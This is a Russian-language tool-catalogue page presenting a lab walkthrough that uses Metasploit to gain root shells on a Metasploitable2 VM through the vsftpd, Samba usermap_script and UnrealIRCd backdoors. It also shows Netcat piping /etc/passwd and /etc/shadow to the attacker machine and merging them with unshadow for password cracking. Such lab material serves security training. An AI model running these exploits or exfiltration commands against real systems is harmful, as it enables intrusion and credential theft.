Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
metasploitable2-exploitation-metasploit — Полное прохождение эксплуатации Metasploit против Metasploitable2 — бэкдор vsftpd, Samba CVE-2007-2447, бэкдор UnrealIRCd, экфильтрация Netcat и подготовка к взлому учетных данных. | Kitploit
Инструменты/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Взлом паролейРазведкаФреймворки для эксплойтовКартирование сетиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Полное прохождение эксплуатации Metasploit против Metasploitable2 — бэкдор vsftpd, Samba CVE-2007-2447, бэкдор UnrealIRCd, экфильтрация Netcat и подготовка к взлому учетных данных.

Репозиторий
1 месяц назадЕщё не проверено

Эксплуатация Metasploitable2 с помощью Metasploit: VSFTPD, Samba и другие

Практическое руководство по эксплуатации с использованием Metasploit Framework — от настройки базы данных PostgreSQL и сканирования db_nmap, через три рутовые оболочки через vsftpd, Samba и UnrealIRCd, до кражи учётных данных с помощью Netcat.


Обзор

Этот репозиторий документирует полное взаимодействие с Metasploit против Metasploitable2 в изолированной лаборатории VirtualBox. Рассматриваемые темы:

  • Настройка Metasploit с бэкендом PostgreSQL и рабочими пространствами
  • Запуск db_nmap для сохранения результатов сканирования непосредственно в базу данных
  • Эксплуатация бэкдора vsftpd 2.3.4 (компрометация цепочки поставок)
  • Эксплуатация Samba CVE-2007-2447 (usermap_script — инъекция команд)
  • Извлечение /etc/passwd и /etc/shadow через Netcat и объединение с помощью unshadow
  • Эксплуатация бэкдора UnrealIRCd 3.2.8.1

Лабораторная среда

МашинаРольIP-адрес
Kali Linux 2026.1Атакующий192.168.1.4
Metasploitable2Цель192.168.1.3

Сеть: 192.168.1.0/24 — полностью изолированная NAT-сеть внутри VirtualBox.


Шаг 1 — Настройка Metasploit и сканирование с поддержкой базы данных

root@kitploit:~
# Запуск PostgreSQL и инициализация базы данных (однократно)
sudo systemctl start postgresql
sudo msfdb init

# Запуск Metasploit
msfconsole

Kali и Metasploitable2 работают

Обновление Kali и запуск PostgreSQL

root@kitploit:~
msf6> db_status           # Проверка: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Подтверждение активного рабочего пространства

Вывод db_status и workspace

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

Сканирование db_nmap выполняется

root@kitploit:~
msf6> hosts
msf6> services

Вывод hosts и services

На Metasploitable2 обнаружено два FTP-сервера:

ПортСлужбаИнформация
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Шаг 2 — Эксплуатация vsftpd 2.3.4 (Бэкдор)

В июле 2011 года исходный архив vsftpd 2.3.4 был скомпрометирован — в него был вставлен бэкдор, открывающий рутовую оболочку на порту 6200, если имя пользователя FTP содержит :). CVE: CVE-2011-2523. Разница кода: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Результат: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

Информация об эксплойте vsftpd - часть 1

Информация об эксплойте vsftpd - часть 2

show options vsftpd

set RHOSTS RPORT LHOST vsftpd

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

Выполнение эксплойта vsftpd и сессия Meterpreter

ls на удалённой рутовой файловой системе

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Вывод whoami root и uname -a

Извлечение хэшей паролей:

root@kitploit:~
cat /etc/shadow | grep '$1'

Хэши паролей из файла shadow


Шаг 3 — Эксплуатация Samba CVE-2007-2447

Версии Samba 3.0.0–3.0.25rc3 передают метасимволы оболочки в поле имени пользователя напрямую в /bin/sh через опцию username map script — до выполнения аутентификации. Metasploitable2 использует Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 эксплойтов найдено

msf6> use exploit/multi/samba/usermap_script
msf6> info

Список эксплойтов Samba из поиска

Информация о Samba usermap_script

Описание CVE Samba и ссылки

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Выполнение эксплойта Samba - сессия открыта

whoami root и smbd --version на оболочке Samba

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Извлечение файлов через Netcat

Вкладка 2 — Kali (приём):

root@kitploit:~
nc -l -p 4567 > passwd.txt

Вкладка 1 — Оболочка эксплойта (отправка):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Прослушиватель Netcat на Kali, принимает passwd

Содержимое passwd.txt после извлечения

Повторить для /etc/shadow, затем объединить:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Шаг 4 — Эксплуатация UnrealIRCd 3.2.8.1 (Бэкдор)

UnrealIRCd 3.2.8.1 распространялся с бэкдором в исходном коде. Отправка AB на порт 6667 приводит к тому, что сервер выполняет любую последующую команду с правами root — без аутентификации.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

Параметры эксплойта UnrealIRCd и выполнение

Рутовая оболочка UnrealIRCd - whoami и uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Необходимые опции:


Рабочий процесс Metasploit вкратце

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

Частые ошибки


Ключевые выводы

  • vsftpd 2.3.4 и UnrealIRCd 3.2.8.1 оба были компрометациями цепочки поставок — бэкдоры были встроены в официальные архивы распространения
  • CVE-2007-2447 в Samba срабатывает до аутентификации — единственным смягчением является установка исправлений
  • Netcat не требует зависимостей и работает для извлечения файлов практически на любой Unix-системе
  • info перед exploit — привычка, которую стоит выработать: она показывает CVE, затронутые версии и необходимые опции

🌐 Свяжитесь со мной

LinkedIn Dev.to

Скачать инструмент
ОпцияЗначениеОписание
RHOSTS192.168.1.3IP-адрес цели
RPORT6667Порт IRC по умолчанию
LHOST192.168.1.4IP-адрес прослушивателя Kali
payloadcmd/unix/bind_netcatПривязанная оболочка через Netcat
ОшибкаЧто происходитИсправление
Пропуск msfdb initНет базы данных — результаты сканирования не сохраняютсяЗапустите sudo msfdb init один раз перед первым использованием
Не установлен LHOSTОбратная оболочка некуда подключатьсяВсегда устанавливайте LHOST на IP вашей Kali
Запуск msfdb init в каждом сеансеПерезаписывает существующие данныеЗапустите один раз; проверьте с помощью sudo msfdb status
Неправильный RPORTЭксплойт безмолвно проваливаетсяПодтвердите порт из services перед установкой
Преждевременное закрытие прослушивателя NetcatУсеченная передача файлаПодождите немного после команды pipe перед CTRL-C
Пропуск unshadowПрограммы взлома паролей отвергают формат раздельных файловВсегда сначала объединяйте passwd + shadow